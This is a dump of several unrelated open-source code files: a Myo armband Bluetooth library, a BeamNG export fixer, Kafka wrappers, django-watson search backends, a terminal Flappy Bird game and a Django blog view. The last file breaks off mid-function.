img_morph_ch = morph_func(img[:, :, ch], structure=kernel).astype(img.dtype)
img_morph.append(img_morph_ch)
# Stack channels, clip them to [0, 255] and represent as original image (prevent invalid range)
return np.clip(np.stack(img_morph, axis=2), 0, 255).astype(img.dtype)
if __name__ == "__main__":
# Create Qt application with window
app = QApplication(sys.argv)
main_win = MainWindow()
# Execute application (blocking)
app.exec_()
sys.exit(0)
``` |
{
"source": "jonpas/myo-raw",
"score": 2
} |
#### File: myo-raw/examples/minimal.py
```python
import argparse
import logging
from myo_raw import MyoRaw, DataCategory, EMGMode
def emg_handler(timestamp, emg, moving, characteristic_num):
print('emg:', timestamp, emg, moving, characteristic_num)
def imu_handler(timestamp, quat, acc, gyro,):
print('imu:', timestamp, quat, acc, gyro)
def battery_handler(timestamp, battery_level):
print('battery level:', timestamp, battery_level)
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument('--tty', default=None, help='The Myo dongle device (autodetected if omitted)')
group.add_argument('--native', default=False, action='store_true', help='Use a native Bluetooth stack')
parser.add_argument('--mac', default=None, help='The Myo MAC address (arbitrarily detected if omitted)')
modes = ', '.join([str(item.value) + ': ' + item.name for item in EMGMode])
parser.add_argument('--emg_mode', type=int, default=EMGMode.RAW, choices=[m.value for m in EMGMode],
help='Choose the EMG receiving mode ({0} - default: %(default)s)'.format(modes))
parser.add_argument('-v', '--verbose', action='count', default=0, help='Increase verbosity')
args = parser.parse_args()
# set logging level to at least logging.INFO
logging.basicConfig(level=max(2 - args.verbose, 0) * 10)
# setup the BLED112 dongle or a native Bluetooth stack with bluepy and connect to a Myo armband
myo = MyoRaw(args.tty, args.native, args.mac)
# add handlers to process EMG, IMU and battery level data
myo.add_handler(DataCategory.EMG, emg_handler)
myo.add_handler(DataCategory.IMU, imu_handler)
myo.add_handler(DataCategory.BATTERY, battery_handler)
# subscribe to all data services
myo.subscribe(args.emg_mode)
# disable sleep to avoid disconnects while retrieving data
myo.set_sleep_mode(1)
# vibrate and change colors (green logo, blue bar) to signalise a successfull setup
myo.vibrate(1)
myo.set_leds([0, 255, 0], [0, 0, 255])
# run until terminated by the user
try:
while True:
myo.run(1)
except KeyboardInterrupt:
pass
finally:
myo.disconnect()
print('Disconnected')
```
#### File: myo-raw/myo_raw/bled112.py
```python
import struct
import threading
import time
import re
import logging
import serial
from serial.tools import list_ports
LOG = logging.getLogger(__name__)
class Packet():
'''BLED112 packet representation'''
def __init__(self, ords):
self.typ = ords[0]
self.cls = ords[2]
self.cmd = ords[3]
self.payload = bytes(ords[4:])
def __repr__(self):
return 'Packet(%02X, %02X, %02X, [%s])' % \
(self.typ, self.cls, self.cmd,
' '.join('%02X' % b for b in list(self.payload)))
class BLED112():
'''Non-Myo-specific Bluetooth backend using the provided BLED112 dongle with pyserial.'''
def __init__(self, tty):
if tty is None:
tty = self._detect_tty()
if tty is None:
raise ValueError('Bluegiga BLED112 dongle not found!')
self.conn = None
self.ser = serial.Serial(port=tty, baudrate=9600, dsrdtr=1)
self.buf = []
self.lock = threading.Lock()
self._internal_handler = None
self._external_handler = None
@staticmethod
def _detect_tty():
'''Try to find a Bluegiga BLED112 dongle'''
for port, desc, hwid in list_ports.comports():
if re.search(r'PID=2458:0*1', hwid):
LOG.debug('using "%s" at port %s', desc, port)
return port
return None
# internal data-handling methods
def recv_packet(self, timeout=None):
t0 = time.time()
self.ser.timeout = None
while timeout is None or time.time() < t0 + timeout:
if timeout is not None:
self.ser.timeout = t0 + timeout - time.time()
c = self.ser.read()
if not c:
return None
ret = self._proc_byte(ord(c))
if ret:
if ret.typ == 0x80:
self._handle_event(ret)
return ret
def _proc_byte(self, c):
if not self.buf:
if c in [0x00, 0x80, 0x08, 0x88]: # [BLE response pkt, BLE event pkt, wifi response pkt, wifi event pkt]
self.buf.append(c)
return None
elif len(self.buf) == 1:
self.buf.append(c)
self.packet_len = 4 + (self.buf[0] & 0x07) + self.buf[1]
return None
else:
self.buf.append(c)
if self.packet_len and len(self.buf) == self.packet_len:
p = Packet(self.buf)
self.buf = []
return p
return None
@property
def handler(self):
return self._external_handler
@handler.setter
def handler(self, func):
# wrap the provided handler function to be able to process BLED112 packets
def wrapped_handle_data(packet):
if (packet.cls, packet.cmd) != (4, 5):
return
_, attr, _ = struct.unpack('<BHB', packet.payload[:4])
pay = packet.payload[5:]
func(attr, pay)
self._external_handler = wrapped_handle_data if callable(func) else None
def _handle_event(self, p):
if self._internal_handler:
self._internal_handler(p)
if self._external_handler:
self._external_handler(p)
def _wait_event(self, cls, cmd):
res = [None]
def h(p):
if p.cls == cls and p.cmd == cmd:
res[0] = p
self._internal_handler = h
while res[0] is None:
self.recv_packet()
self._internal_handler = None
return res[0]
# specific BLE commands
def scan(self, target_uuid, target_address=None):
# stop scanning and terminate previous connection 0, 1 and 2
self._send_command(6, 4)
for connection_number in range(3):
self._send_command(3, 0, struct.pack('<B', connection_number))
# start scanning
LOG.info('scanning for devices...')
self._send_command(6, 2, b'\x01')
while True:
packet = self.recv_packet()
if packet.payload.endswith(bytes.fromhex(target_uuid)):
address = list(list(packet.payload[2:8]))
address_string = ':'.join(format(item, '02x') for item in reversed(address))
LOG.debug('found a Bluetooth device (MAC address: %s)', address_string)
if target_address is None or target_address.lower() == address_string:
# stop scanning and return the found mac address
self._send_command(6, 4)
return address_string
def connect(self, target_address):
address = [int(item, 16) for item in reversed(target_address.split(':'))]
conn_pkt = self._send_command(6, 3, struct.pack('<6sBHHHH', bytes(address), 0, 6, 6, 64, 0))
self.conn = list(conn_pkt.payload)[-1]
self._wait_event(3, 0)
def disconnect(self):
if self.conn is not None:
return self._send_command(3, 0, struct.pack('<B', self.conn))
return None
def read_attr(self, attr):
if self.conn is not None:
self._send_command(4, 4, struct.pack('<BH', self.conn, attr))
ble_payload = self._wait_event(4, 5).payload
# strip off the 4 byte L2CAP header and the payload length byte of the ble payload field
return ble_payload[5:]
return None
def write_attr(self, attr, val, wait_response=True):
if self.conn is not None:
self._send_command(4, 5, struct.pack('<BHB', self.conn, attr, len(val)) + val)
if wait_response:
ble_payload = self._wait_event(4, 1).payload
# strip off the 4 byte L2CAP header and the payload length byte of the ble payload field
return ble_payload[5:]
return None
def _send_command(self, cls, cmd, payload=b''):
s = struct.pack('<4B', 0, len(payload), cls, cmd) + payload
self.ser.write(s)
while True:
p = self.recv_packet()
# no timeout, so p won't be None
if p.typ == 0:
return p
# not a response: must be an event
self._handle_event(p)
```
#### File: myo-raw/myo_raw/native.py
```python
import logging
from bluepy import btle
LOG = logging.getLogger(__name__)
class Delegate(btle.DefaultDelegate):
'''Store handlers to be called from a bluepy Peripheral on receiving notifications'''
def __init__(self):
super().__init__()
self.handler = None
def handleNotification(self, cHandle, data):
if self.handler:
self.handler(cHandle, data)
class Native(btle.Peripheral):
'''Non-Myo-specific Bluetooth backend based on a bluepy to use standard Bluetooth adapters.'''
def __init__(self):
super().__init__()
self.withDelegate(Delegate())
LOG.debug('using bluepy backend')
@staticmethod
def scan(target_uuid, target_address=None):
LOG.info('scanning for devices...')
scanner = btle.Scanner()
while True:
devices = scanner.scan(timeout=1)
for dev in devices:
uuid = next(item[2] for item in dev.getScanData() if item[0] == 6)
if target_uuid == uuid:
LOG.debug('found a Bluetooth device (MAC address: %s)', dev.addr)
if target_address is None or target_address.lower() == dev.addr:
return dev.addr
@property
def handler(self):
return self.delegate.handler
@handler.setter
def handler(self, func):
self.delegate.handler = func if callable(func) else None
def recv_packet(self, timeout=None):
self.waitForNotifications(timeout)
def read_attr(self, attr):
return self.readCharacteristic(attr)
def write_attr(self, attr, val, wait_response=True):
return self.writeCharacteristic(attr, val, withResponse=wait_response)
``` |
{
"source": "jonpecar/automationBeamNgExportFix",
"score": 2
} |
#### File: automationBeamNgExportFix/automationBeamNgExportFix/exportFix.py
```python
from io import BytesIO
import zipfile
from os import path
from typing import List
TARGET_LINES = [br'"cylinderWallTemperatureDamageThreshold"',
br'"damageThresholdTemperature"']
NEW_VALUE_STRING = b'99999999'
def get_target_file_path(zip_file_path : str):
dir, file_name = path.split(zip_file_path)
file_name_no_ext, ext = path.splitext(file_name)
return '/'.join(('vehicles', file_name_no_ext, 'camso_engine.jbeam')) #Do this manually (not using path.join()) as this always uses unix separators
def update_line(line : bytes):
for target_line in TARGET_LINES:
if target_line in line:
start_pos = line.find(b':')
end_pos = line.find(b',')
new_line = line[:start_pos + 1] + NEW_VALUE_STRING + line[end_pos:]
return new_line
return line
def fix_file(zip_file_path : str):
target_file = get_target_file_path(zip_file_path)
output_object = BytesIO()
with zipfile.ZipFile(zip_file_path) as inzip, zipfile.ZipFile(output_object, 'w') as outzip:
for inzipinfo in inzip.infolist():
with inzip.open(inzipinfo) as infile:
if inzipinfo.filename == target_file:
in_content = infile.readlines()
for i in range(len(in_content)):
in_content[i] = update_line(in_content[i])
out_content = bytes()
for line in in_content:
out_content += line
outzip.writestr(inzipinfo, out_content)
else:
outzip.writestr(inzipinfo, infile.read())
with open(zip_file_path, 'wb') as f:
output_object.seek(0)
f.write(output_object.read())
```
#### File: automationBeamNgExportFix/automationBeamNgExportFix/__main__.py
```python
from . import exportFix, get_files
import argparse
import os
def check_file(file):
if not os.access(file, os.W_OK):
parser.error('File could not be accessed. Make sure file exists and can be modified')
else:
return file
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Update mod exported into BeamNG Drive from Automation for turbo overheating bug. Can be done either automatically on a set number of most recent files or on a specified file path')
parser.add_argument('-f', dest='filepath', help='Filepath to operate on', metavar='FILE', type=check_file)
parser.add_argument('-a', dest='auto_count', help='Automatically operate on latest files in BeamNG mods folder', metavar='N', type=int)
args = parser.parse_args()
if not(args.filepath or args.auto_count):
parser.error('Must select at least one option')
if args.filepath:
exportFix.fix_file(args.filepath)
if args.auto_count:
for file in get_files.get_files_sorted()[:args.auto_count]:
exportFix.fix_file(file)
``` |
{
"source": "jon-perrett/f1-2021-tools",
"score": 3
} |
#### File: f1-2021-tools/kafka/kafka_consumer.py
```python
import logging
from confluent_kafka import Consumer
class KafkaConsumer:
"""Wrapper class for commonly used Kafka consumer methods"""
def __init__(self, config, subscriptions):
self.consumer = Consumer(config)
self.consumer.subscribe(subscriptions)
def get_messages(self):
"""Prints messages on subscribed topics"""
while True:
msg = self.consumer.poll(1.0)
if msg is None:
continue
if msg.error():
logging.error("Consumer error: {}".format(msg.error()))
continue
print("Received message: {}".format(msg.value().decode("utf-8")))
def close_consumer(self):
self.consumer.close()
```
#### File: f1-2021-tools/kafka/kafka_producer.py
```python
import logging
from confluent_kafka import Producer
import json
class KafkaProducer:
"""Wrapper class for Kafka producer, to provide easy interface to commonly used methods"""
def __init__(self, config):
self.producer = Producer(config)
self.config = config
@staticmethod
def delivery_report(err, msg):
"""Called once for each message produced to indicate delivery result.
Triggered by poll() or flush()."""
if err is not None:
logging.info("Message delivery failed: {}".format(err))
else:
logging.info(
"Message delivered to {} [{}]".format(msg.topic(), msg.partition())
)
def produce_data(self, topic: str, message: dict):
# Trigger any available delivery report callbacks from previous produce() calls
self.producer.poll(0)
# Asynchronously produce a message, the delivery report callback
# will be triggered from poll() above, or flush() below, when the message has
# been successfully delivered or failed permanently.
self.producer.produce(
topic,
json.dumps(json.loads(message.__repr__().encode("utf-8"))),
callback=self.delivery_report,
)
# Wait for any outstanding messages to be delivered and delivery report
# callbacks to be triggered.
self.producer.flush()
``` |
{
"source": "jonperron/django-watson",
"score": 3
} |
#### File: django-watson/watson/backends.py
```python
from __future__ import unicode_literals
import abc
import re
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.db import transaction, connections, router
from django.db.models import Q
from django.utils.encoding import force_text
from django.utils import six
from watson.models import SearchEntry, has_int_pk
def regex_from_word(word):
"""Generates a regext from the given search word."""
return "(\s{word})|(^{word})".format(
word=re.escape(word),
)
# PostgreSQL to_tsquery operators: ! & : ( ) |
RE_POSTGRES_ESCAPE_CHARS = re.compile(r'[&:(|)!><]', re.UNICODE)
# MySQL boolean full-text search operators: > < ( ) " ~ * + -
RE_MYSQL_ESCAPE_CHARS = re.compile(r'["()><~*+-]', re.UNICODE)
RE_SPACE = re.compile(r"[\s]+", re.UNICODE)
def escape_query(text, re_escape_chars):
"""
normalizes the query text to a format that can be consumed
by the backend database
"""
text = force_text(text)
text = RE_SPACE.sub(" ", text) # Standardize spacing.
text = re_escape_chars.sub(" ", text) # Replace harmful characters with space.
text = text.strip()
return text
class SearchBackend(six.with_metaclass(abc.ABCMeta)):
"""Base class for all search backends."""
def is_installed(self):
"""Checks whether django-watson is installed."""
return True
def do_install(self):
"""Executes the SQL needed to install django-watson."""
pass
def do_uninstall(self):
"""Executes the SQL needed to uninstall django-watson."""
pass
requires_installation = False
supports_ranking = False
supports_prefix_matching = False
def do_search_ranking(self, engine_slug, queryset, search_text):
"""Ranks the given queryset according to the relevance of the given search text."""
return queryset.extra(
select={
"watson_rank": "1",
},
)
@abc.abstractmethod
def do_search(self, engine_slug, queryset, search_text):
"""Filters the given queryset according the the search logic for this backend."""
raise NotImplementedError
def do_filter_ranking(self, engine_slug, queryset, search_text):
"""Ranks the given queryset according to the relevance of the given search text."""
return queryset.extra(
select={
"watson_rank": "1",
},
)
@abc.abstractmethod
def do_filter(self, engine_slug, queryset, search_text):
"""Filters the given queryset according the the search logic for this backend."""
raise NotImplementedError
def do_string_cast(self, connection, column_name):
"""Casts the given column name to string."""
return connection.ops.quote_name(column_name)
class RegexSearchMixin(six.with_metaclass(abc.ABCMeta)):
"""Mixin to adding regex search to a search backend."""
supports_prefix_matching = True
def do_search(self, engine_slug, queryset, search_text):
"""Filters the given queryset according the the search logic for this backend."""
word_query = Q()
for word in search_text.split():
regex = regex_from_word(word)
word_query &= (Q(title__iregex=regex) | Q(description__iregex=regex) | Q(content__iregex=regex))
return queryset.filter(
word_query
)
def do_filter(self, engine_slug, queryset, search_text):
"""Filters the given queryset according the the search logic for this backend."""
model = queryset.model
connection = connections[queryset.db]
db_table = connection.ops.quote_name(SearchEntry._meta.db_table)
model_db_table = connection.ops.quote_name(model._meta.db_table)
pk = model._meta.pk
id = connection.ops.quote_name(pk.db_column or pk.attname)
# Add in basic filters.
word_query = ["""
({db_table}.{engine_slug} = %s)
""", """
({db_table}.{content_type_id} = %s)
"""]
word_kwargs = {
"db_table": db_table,
"model_db_table": model_db_table,
"engine_slug": connection.ops.quote_name("engine_slug"),
"title": connection.ops.quote_name("title"),
"description": connection.ops.quote_name("description"),
"content": connection.ops.quote_name("content"),
"content_type_id": connection.ops.quote_name("content_type_id"),
"object_id": connection.ops.quote_name("object_id"),
"object_id_int": connection.ops.quote_name("object_id_int"),
"id": id,
"iregex_operator": connection.operators["iregex"],
}
word_args = [
engine_slug,
ContentType.objects.get_for_model(model).id,
]
# Add in join.
if has_int_pk(model):
word_query.append("""
({db_table}.{object_id_int} = {model_db_table}.{id})
""")
else:
word_query.append("""
({db_table}.{object_id} = {model_db_table}.{id})
""")
# Add in all words.
for word in search_text.split():
regex = regex_from_word(word)
word_query.append(
"""
({db_table}.{title} {iregex_operator}
OR {db_table}.{description} {iregex_operator}
OR {db_table}.{content} {iregex_operator})
"""
)
word_args.extend((regex, regex, regex))
# Compile the query.
full_word_query = " AND ".join(word_query).format(**word_kwargs)
return queryset.extra(
tables=(db_table,),
where=(full_word_query,),
params=word_args,
)
class RegexSearchBackend(RegexSearchMixin, SearchBackend):
"""A search backend that works with SQLite3."""
class PostgresSearchBackend(SearchBackend):
"""A search backend that uses native PostgreSQL full text indices."""
search_config = getattr(settings, "WATSON_POSTGRES_SEARCH_CONFIG", "pg_catalog.english")
"""Text search configuration to use in `to_tsvector` and `to_tsquery` functions"""
def escape_postgres_query(self, text):
"""Escapes the given text to become a valid ts_query."""
return " & ".join(
"$${0}$$:*".format(word)
for word
in escape_query(text, RE_POSTGRES_ESCAPE_CHARS).split()
)
def is_installed(self, schema_name="public"):
"""Checks whether django-watson is installed."""
connection = connections[router.db_for_read(SearchEntry)]
cursor = connection.cursor()
cursor.execute("""
SELECT oid FROM pg_namespace WHERE nspname = '{schema_name}'
""".format(schema_name=schema_name))
relnamespaceid = cursor.fetchone()[0]
cursor.execute("""
SELECT attname FROM pg_attribute
WHERE attrelid = (SELECT oid FROM pg_class WHERE relname = 'watson_searchentry' AND relnamespace = '{relnamespaceid}') AND attname = 'search_tsv';
""".format(relnamespaceid=relnamespaceid))
return bool(cursor.fetchall())
@transaction.atomic()
def do_install(self):
"""Executes the PostgreSQL specific SQL code to install django-watson."""
connection = connections[router.db_for_write(SearchEntry)]
connection.cursor().execute("""
-- Ensure that plpgsql is installed.
CREATE OR REPLACE FUNCTION make_plpgsql() RETURNS VOID LANGUAGE SQL AS
$$
CREATE LANGUAGE plpgsql;
$$;
SELECT
CASE
WHEN EXISTS(
SELECT 1
FROM pg_catalog.pg_language
WHERE lanname='plpgsql'
)
THEN NULL
ELSE make_plpgsql() END;
DROP FUNCTION make_plpgsql();
-- Create the search index.
ALTER TABLE watson_searchentry ADD COLUMN search_tsv tsvector NOT NULL;
CREATE INDEX watson_searchentry_search_tsv ON watson_searchentry USING gin(search_tsv);
-- Create the trigger function.
CREATE OR REPLACE FUNCTION watson_searchentry_trigger_handler() RETURNS trigger AS $$
begin
new.search_tsv :=
setweight(to_tsvector('{search_config}', coalesce(new.title, '')), 'A') ||
setweight(to_tsvector('{search_config}', coalesce(new.description, '')), 'C') ||
setweight(to_tsvector('{search_config}', coalesce(new.content, '')), 'D');
return new;
end
$$ LANGUAGE plpgsql;
CREATE TRIGGER watson_searchentry_trigger BEFORE INSERT OR UPDATE
ON watson_searchentry FOR EACH ROW EXECUTE PROCEDURE watson_searchentry_trigger_handler();
""".format(
search_config=self.search_config
))
@transaction.atomic()
def do_uninstall(self):
"""Executes the PostgreSQL specific SQL code to uninstall django-watson."""
connection = connections[router.db_for_write(SearchEntry)]
connection.cursor().execute("""
ALTER TABLE watson_searchentry DROP COLUMN search_tsv;
DROP TRIGGER watson_searchentry_trigger ON watson_searchentry;
DROP FUNCTION watson_searchentry_trigger_handler();
""")
requires_installation = True
supports_ranking = True
supports_prefix_matching = True
def do_search(self, engine_slug, queryset, search_text):
"""Performs the full text search."""
return queryset.extra(
where=("search_tsv @@ to_tsquery('{search_config}', %s)".format(
search_config=self.search_config
),),
params=(self.escape_postgres_query(search_text),),
)
def do_search_ranking(self, engine_slug, queryset, search_text):
"""Performs full text ranking."""
return queryset.extra(
select={
"watson_rank": "ts_rank_cd(watson_searchentry.search_tsv, to_tsquery('{search_config}', %s))".format(
search_config=self.search_config
),
},
select_params=(self.escape_postgres_query(search_text),),
order_by=("-watson_rank",),
)
def do_filter(self, engine_slug, queryset, search_text):
"""Performs the full text filter."""
model = queryset.model
content_type = ContentType.objects.get_for_model(model)
connection = connections[queryset.db]
pk = model._meta.pk
if has_int_pk(model):
ref_name = "object_id_int"
ref_name_typecast = ""
else:
ref_name = "object_id"
# Cast to text to make join work with uuid columns
ref_name_typecast = "::text"
return queryset.extra(
tables=("watson_searchentry",),
where=(
"watson_searchentry.engine_slug = %s",
"watson_searchentry.search_tsv @@ to_tsquery('{search_config}', %s)".format(
search_config=self.search_config
),
"watson_searchentry.{ref_name} = {table_name}.{pk_name}{ref_name_typecast}".format(
ref_name=ref_name,
table_name=connection.ops.quote_name(model._meta.db_table),
pk_name=connection.ops.quote_name(pk.db_column or pk.attname),
ref_name_typecast=ref_name_typecast
),
"watson_searchentry.content_type_id = %s"
),
params=(engine_slug, self.escape_postgres_query(search_text), content_type.id),
)
def do_filter_ranking(self, engine_slug, queryset, search_text):
"""Performs the full text ranking."""
return queryset.extra(
select={
"watson_rank": "ts_rank_cd(watson_searchentry.search_tsv, to_tsquery('{search_config}', %s))".format(
search_config=self.search_config
),
},
select_params=(self.escape_postgres_query(search_text),),
order_by=("-watson_rank",),
)
def do_string_cast(self, connection, column_name):
return "{column_name}::text".format(
column_name=connection.ops.quote_name(column_name),
)
class PostgresLegacySearchBackend(PostgresSearchBackend):
"""
A search backend that uses native PostgreSQL full text indices.
This backend doesn't support prefix matching, and works with PostgreSQL 8.3 and below.
"""
supports_prefix_matching = False
def escape_postgres_query(self, text):
"""Escapes the given text to become a valid ts_query."""
return " & ".join(
"$${0}$$".format(word)
for word
in escape_query(text, RE_POSTGRES_ESCAPE_CHARS).split()
)
class PostgresPrefixLegacySearchBackend(RegexSearchMixin, PostgresLegacySearchBackend):
"""
A legacy search backend that uses a regexp to perform matches, but still allows
relevance rankings.
Use if your postgres vesion is less than 8.3, and you absolutely can't live without
prefix matching. Beware, this backend can get slow with large datasets!
"""
def escape_mysql_boolean_query(search_text):
return " ".join(
'+{word}*'.format(
word=word,
)
for word in escape_query(search_text, RE_MYSQL_ESCAPE_CHARS).split()
)
class MySQLSearchBackend(SearchBackend):
def is_installed(self):
"""Checks whether django-watson is installed."""
connection = connections[router.db_for_read(SearchEntry)]
cursor = connection.cursor()
cursor.execute("SHOW INDEX FROM watson_searchentry WHERE Key_name = 'watson_searchentry_fulltext'")
return bool(cursor.fetchall())
def do_install(self):
"""Executes the MySQL specific SQL code to install django-watson."""
connection = connections[router.db_for_write(SearchEntry)]
cursor = connection.cursor()
# Drop all foreign keys on the watson_searchentry table.
cursor.execute(
"SELECT CONSTRAINT_NAME FROM information_schema.TABLE_CONSTRAINTS "
"WHERE CONSTRAINT_SCHEMA = DATABASE() "
"AND TABLE_NAME = 'watson_searchentry' "
"AND CONSTRAINT_TYPE = 'FOREIGN KEY'"
)
for constraint_name, in cursor.fetchall():
cursor.execute(
"ALTER TABLE watson_searchentry DROP FOREIGN KEY {constraint_name}".format(
constraint_name=constraint_name,
)
)
# Change the storage engine to MyISAM.
cursor.execute("ALTER TABLE watson_searchentry ENGINE = MyISAM")
# Add the full text indexes.
cursor.execute("CREATE FULLTEXT INDEX watson_searchentry_fulltext "
"ON watson_searchentry (title, description, content)")
cursor.execute("CREATE FULLTEXT INDEX watson_searchentry_title "
"ON watson_searchentry (title)")
cursor.execute("CREATE FULLTEXT INDEX watson_searchentry_description "
"ON watson_searchentry (description)")
cursor.execute("CREATE FULLTEXT INDEX watson_searchentry_content "
"ON watson_searchentry (content)")
def do_uninstall(self):
"""Executes the SQL needed to uninstall django-watson."""
connection = connections[router.db_for_write(SearchEntry)]
cursor = connection.cursor()
# Destroy the full text indexes.
cursor.execute("DROP INDEX watson_searchentry_fulltext ON watson_searchentry")
cursor.execute("DROP INDEX watson_searchentry_title ON watson_searchentry")
cursor.execute("DROP INDEX watson_searchentry_description ON watson_searchentry")
cursor.execute("DROP INDEX watson_searchentry_content ON watson_searchentry")
supports_prefix_matching = True
requires_installation = True
supports_ranking = True
def _format_query(self, search_text):
return escape_mysql_boolean_query(search_text)
def do_search(self, engine_slug, queryset, search_text):
"""Performs the full text search."""
return queryset.extra(
where=("MATCH (title, description, content) AGAINST (%s IN BOOLEAN MODE)",),
params=(self._format_query(search_text),),
)
def do_search_ranking(self, engine_slug, queryset, search_text):
"""Performs full text ranking."""
search_text = self._format_query(search_text)
return queryset.extra(
select={
"watson_rank": """
((MATCH (title) AGAINST (%s IN BOOLEAN MODE)) * 3) +
((MATCH (description) AGAINST (%s IN BOOLEAN MODE)) * 2) +
((MATCH (content) AGAINST (%s IN BOOLEAN MODE)) * 1)
""",
},
select_params=(search_text, search_text, search_text,),
order_by=("-watson_rank",),
)
def do_filter(self, engine_slug, queryset, search_text):
"""Performs the full text filter."""
model = queryset.model
content_type = ContentType.objects.get_for_model(model)
connection = connections[queryset.db]
pk = model._meta.pk
if has_int_pk(model):
ref_name = "object_id_int"
else:
ref_name = "object_id"
return queryset.extra(
tables=("watson_searchentry",),
where=(
"watson_searchentry.engine_slug = %s",
"MATCH (watson_searchentry.title, watson_searchentry.description, watson_searchentry.content) "
"AGAINST (%s IN BOOLEAN MODE)",
"watson_searchentry.{ref_name} = {table_name}.{pk_name}".format(
ref_name=ref_name,
table_name=connection.ops.quote_name(model._meta.db_table),
pk_name=connection.ops.quote_name(pk.db_column or pk.attname),
),
"watson_searchentry.content_type_id = %s",
),
params=(engine_slug, self._format_query(search_text), content_type.id),
)
def do_filter_ranking(self, engine_slug, queryset, search_text):
"""Performs the full text ranking."""
search_text = self._format_query(search_text)
return queryset.extra(
select={
"watson_rank": """
((MATCH (watson_searchentry.title) AGAINST (%s IN BOOLEAN MODE)) * 3) +
((MATCH (watson_searchentry.description) AGAINST (%s IN BOOLEAN MODE)) * 2) +
((MATCH (watson_searchentry.content) AGAINST (%s IN BOOLEAN MODE)) * 1)
""",
},
select_params=(search_text, search_text, search_text,),
order_by=("-watson_rank",),
)
def get_postgresql_version(connection):
"""Returns the version number of the PostgreSQL connection."""
from django.db.backends.postgresql_psycopg2.version import get_version
return get_version(connection)
class AdaptiveSearchBackend(SearchBackend):
"""
A search backend that guesses the correct search backend based on the
DATABASES["default"] settings.
"""
def __new__(cls):
"""Guess the correct search backend and initialize it."""
connection = connections[router.db_for_read(SearchEntry)]
if connection.vendor == "postgresql":
version = get_postgresql_version(connection)
if version > 80400:
return PostgresSearchBackend()
if version > 80300:
return PostgresLegacySearchBackend()
if connection.vendor == "mysql":
return MySQLSearchBackend()
return RegexSearchBackend()
``` |
{
"source": "jonpeters/google-cloud-ref-impl",
"score": 3
} |
#### File: cloud-functions/http-handler/main.py
```python
from flask import Request, Response
import json
from db import db
from concurrent import futures
from google.cloud import pubsub_v1
from typing import Callable, List
import os
import functions_framework
import debug
@functions_framework.http
def entry_point(request: Request):
method = request.method.upper()
with db.connect() as conn:
if method == "GET":
results = conn.execute("SELECT name FROM items").fetchall()
results = [result[0] for result in results]
return Response(json.dumps(results), status=200)
elif method == "POST":
publish([request.data.decode("UTF-8")])
return Response(status=200)
def publish(messages: List[str]):
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(
os.getenv("GCP_PROJECT"), os.getenv("TOPIC_ID"))
publish_futures = []
def get_callback(
publish_future: pubsub_v1.publisher.futures.Future, data: str
) -> Callable[[pubsub_v1.publisher.futures.Future], None]:
def callback(publish_future: pubsub_v1.publisher.futures.Future) -> None:
try:
# Wait 60 seconds for the publish call to succeed.
print(publish_future.result(timeout=60))
except futures.TimeoutError:
print(f"Publishing {data} timed out.")
return callback
for message in messages:
# When you publish a message, the client returns a future.
publish_future = publisher.publish(topic_path, message.encode("utf-8"))
# Non-blocking. Publish failures are handled in the callback function.
publish_future.add_done_callback(get_callback(publish_future, message))
publish_futures.append(publish_future)
# Wait for all the publish futures to resolve before exiting.
futures.wait(publish_futures, return_when=futures.ALL_COMPLETED)
``` |
{
"source": "JonPizza/crappybird-py",
"score": 3
} |
#### File: JonPizza/crappybird-py/main.py
```python
import curses
from curses import wrapper
import time
import random
class Birdie:
def __init__(self, y=5, downward_accl=0):
self.y = y
self.downward_accl = downward_accl # downward acceleration
def flap(self):
self.y -= 1
self.downward_accl = -2
def update(self, counter):
if counter % 2 == 0:
self.y += 1 + self.downward_accl
if counter % 10 == 0:
self.downward_accl += 1
def draw(self, stdscr):
stdscr.addstr(self.y, 20, '>', curses.color_pair(2))
stdscr.refresh()
class Pipe:
def __init__(self, x=78, opening=None):
if opening:
self.opening = opening
else:
self.opening = random.randint(2, 13)
self.x = x
def update(self):
self.x -= 1
def draw(self, stdscr):
for i in range(24):
if i not in [i for i in range(self.opening, self.opening+7)]:
stdscr.addstr(i, self.x, '█')
stdscr.refresh()
def karl_within(self, karl: Birdie):
locations = []
for i in range(24):
if i not in [i for i in range(self.opening, self.opening+7)]:
locations.append([i, self.x])
return [karl.y, 20] in locations
def karl_passing(self, karl: Birdie):
locations = []
for i in range(24):
if i in [i for i in range(self.opening, self.opening+7)]:
locations.append([i, self.x])
return [karl.y, 20] in locations
def main(stdscr):
karl = Birdie()
pipes = []
counter = 0
points = 0
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLUE)
curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_RED)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_YELLOW, curses.COLOR_YELLOW)
stdscr.bkgd(' ', curses.color_pair(1) | curses.A_BOLD)
stdscr.nodelay(True)
curses.curs_set(0)
while True:
if points == 35:
# change to HELL MODE
curses.init_pair(1, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_YELLOW)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
stdscr.erase()
k = stdscr.getch()
if k == ord(' '):
karl.flap()
karl.update(counter)
try: # throws error if karl is outside of stdscr
karl.draw(stdscr)
except:
return points
for pipe in pipes:
if pipe.x >= 0:
pipe.draw(stdscr)
pipe.update()
if pipe.karl_within(karl):
return points
if pipe.karl_passing(karl):
points += 1
else:
del pipe
if counter % 40 == 0:
pipes.append(Pipe())
stdscr.addstr(0, 0, f'Points: {points}', curses.color_pair(3))
stdscr.addstr(23, 0, '█'*79, curses.color_pair(4))
stdscr.refresh()
counter += 1
time.sleep(0.04)
def death_message(points):
if points == 0:
print('What\'s wrong with you?? Eh??')
elif points < 10:
print('That\'s all you got!?')
elif points < 30:
print('You\'re getting a little better...')
elif points < 50:
print('Wowza! That\'s pretty darn good!')
else:
print('You must be a hacker.')
if __name__ == '__main__':
points = wrapper(main)
print(f'Points: {points}')
death_message(points)
# https://jon.network
``` |
{
"source": "JonPizza/Django-Blog",
"score": 2
} |
#### File: Django-Blog/posts/views.py
```python
from django.shortcuts import render
from .models import Post
def get_ctfs():
return [p.catagory for p in Post.objects.all()[::-1]][:5]
def index(request):
return render(request, 'index.html', {'posts': Post.objects.all(), 'ctfs': get_ctfs()})
def filter_for_ctf(request, ctf):
